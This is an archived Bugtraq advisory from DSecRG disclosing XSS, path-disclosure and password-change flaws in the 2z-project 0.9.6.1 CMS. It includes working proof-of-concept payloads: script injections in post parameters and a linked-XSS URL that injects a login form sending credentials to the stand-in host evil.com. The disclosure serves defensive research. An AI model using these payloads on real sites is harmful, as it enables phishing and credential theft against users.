Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

2z-project 0.9.6.1 Multiple Security Vulnerabilities

from [Digital Security Research Group [DSecRG]] Network Security [Permanent Link]
Subject: 2z-project 0.9.6.1 Multiple Security Vulnerabilities
Date: Fri, 28 Dec 2007 16:26:11 +0300 

Digital Security Research Group [DSecRG] Advisory

Name:                    2z project
Systems Affected:        2z project 0.9.6.1
Vendor URL:              http://2z-project.ru
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Reasearch Group [DSecRG] (research 
[at] dsec [dot] ru)
Reported:                27.12.2007
Vendor response:         27.12.2007
Date of Public Advisory: 28.12.2007

Description
***********

2z system has multiple security vulnerabilities:

1.  Stored XSS
2.  Linked XSS
3.  Image XSS
4.  Path disclosure
5.  Vulnerable Password changing algorithm


Details
*******


1. Multiple Stored XSS


1.1 Vulnerability in script  http://[server]/[installdir]/?action=addnews  in 
post parameters:

parameter name = contentshort
parameter name = contentfull

Example:

contentshort=<script>alert('DSecRG XSS')</script>
contentfull=<script>alert('DSecRG XSS')</script>


1.2 Vulnerability in script 
http://[server]/[installdir]/2z/admin.php?mod=pm&action=write

parameter name = content

Example:

content=<script>alert('DSecRG XSS')</script>

---------------------------------------------------

2. Linked XSS Vulnerability in page index.php.
Working only if user not logged in. So it can be used for Phishing (see 
Example).

Template /templates/default/usermenu.tpl have vulnetability parameter 
"referer". 
This template included to index.php, so it can be used for Phishing.

Source code of usermenu.tpl:
---------------------------------------
<form name="login" method="post" action="" id="login">
<input type="hidden" name="referer" value="{request_uri}" />   <-- html code 
injected into {request_uri} 
<input type="hidden" name="action" value="dologin" />
..
<input onfocus="if (!set_login){set_login=1;this.value='';}" value="{l_name}" 
class="mw_login_form" type="text" name="username" maxlength="60" size="25" />
..
<input onfocus="if(!set_pass){set_pass=1;this.value='';}" value="{l_password}" 
class="mw_login_form" type="password" name="password" maxlength="20" size="25" 
/>
..
</from>
---------------------------------------

Example:

http://[server]/[installdir]/?"/><form/name="login"/method="post"/action="http://evil.com/sniffer.php"/id="login";><input/type="hidden"/name="referer"/value="
http://[server]/[installdir]/index.php?"/><form/name="login"/method="post"/action="http://evil.com/sniffer.php"/id="login";><input/type="hidden"/name="referer"/value="

-------------------------------------------------

3. Image XSS Vulnetability in page /2z/?action=profile  

Attacker can  upload  avatar and photo contained a XSS code.

Vulnerable parameters: newavatar, newphoto

For more information see http://www.dsec.ru/about/articles/web_xss/ (in russian)

-------------------------------------------------

4.  Path disclosure

By exploiting this issue, an attacker may gain sensitive information on the 
directory 
structure of the server machine, which allows for further attacks against the 
site. 

Example:

http://[server]/[installdir]/index.php?template=test
http://[server]/[installdir]/?year=1234&month=06 

-------------------------------------------------

5. Password changing vulnerabiluity

Old password not needed to change password.

-------------------------------------------------


About
*****

Digital Security is leading IT security company in Russia, providing 
information 
security consulting, audit and penetration testing services, risk analysis and 
ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS 
standards.
Digital Security Research Group focuses on web application and database 
security 
problems with vulnerability reports, advisories and whitepapers posted 
regularly 
on our website.


Contact:        research [at] dsec [dot] ru
                http://www.dsec.ru (in Russian)
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • 2z-project 0.9.6.1 Multiple Security Vulnerabilities, Digital Security Research Group [DSecRG] <=
Previous by Date:  FAQMasterFlexPlus multiple vulnerabilities, Juan Galiana
Next by Date:  [SECURITY] [DSA 1438-1] New tar packages fix several vulnerabilities, Florian Weimer
Previous by Thread:  FAQMasterFlexPlus multiple vulnerabilities, Juan Galiana
Next by Thread:  [SECURITY] [DSA 1438-1] New tar packages fix several vulnerabilities, Florian Weimer
Indexes:  [Date] [Thread] [Top] [All Lists]